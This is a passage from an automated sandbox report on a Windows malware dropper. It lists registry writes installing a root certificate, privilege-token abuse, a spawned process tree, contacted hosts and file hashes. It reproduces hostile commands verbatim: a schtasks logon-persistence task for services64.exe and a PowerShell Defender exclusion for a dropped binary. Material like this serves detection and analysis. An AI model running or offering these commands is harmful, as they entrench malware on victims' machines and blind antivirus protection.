0b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\4f5baa1083db067.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\c862a054a35.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2524 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
PID 2524 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
PID 2524 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
PID 2524 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
PID 2524 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
PID 2524 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
PID 2524 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
PID 2264 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08240101651be7e1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 9aa6e16872.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 1710990cbc64.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 53516815d3135fe3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c c862a054a35.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 4f5baa1083db067.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f34b9ab9db6d16.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c e4b2f18fb52218.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 453c5fa76a849.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08240101651be7e010.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\4f5baa1083db067.exe

4f5baa1083db067.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\53516815d3135fe3.exe

53516815d3135fe3.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe

e4b2f18fb52218.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe

9aa6e16872.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\f34b9ab9db6d16.exe

f34b9ab9db6d16.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\53516815d3135fe3.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\53516815d3135fe3.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe

1710990cbc64.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e010.exe

08240101651be7e010.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\c862a054a35.exe

c862a054a35.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\453c5fa76a849.exe

453c5fa76a849.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e1.exe

08240101651be7e1.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe" -a

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732527216 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 432

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS5BC7.tmp\Install.cmd" "

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3040 CREDAT:275457 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 live.goatgame.live udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 172.67.75.166:443 db-ip.com tcp
US 8.8.8.8:53 api.db-ip.com udp
US 104.26.5.15:443 api.db-ip.com tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.27.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.18:443 prophefliloc.tumblr.com tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 www.iyiqian.com udp
MD 176.123.2.239:80 176.123.2.239 tcp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
N/A 127.0.0.1:49266 tcp
N/A 127.0.0.1:49269 tcp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 sanctam.net udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
LV 45.142.213.135:30058 tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe

MD5 aaaf685d045b423d4d96ecaca344b4d5
SHA1 f2264a40421e66029db1cdf7fe8bb8ada2614862
SHA256 f77fee8eef443261bc896ac6f10c099277a5fd31baa88f4fa171905157c5d6d8
SHA512 8e01c8cf6623250050c099f2cb139aeac6b6318841d23d7701e6ceffc0dcdba79220533af1e84a34750ac7efc2d56750aeb9a5468ca12a12dab9ce2f1899ec4e

\Users\Admin\AppData\Local\Temp\7zSCD9986B6\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
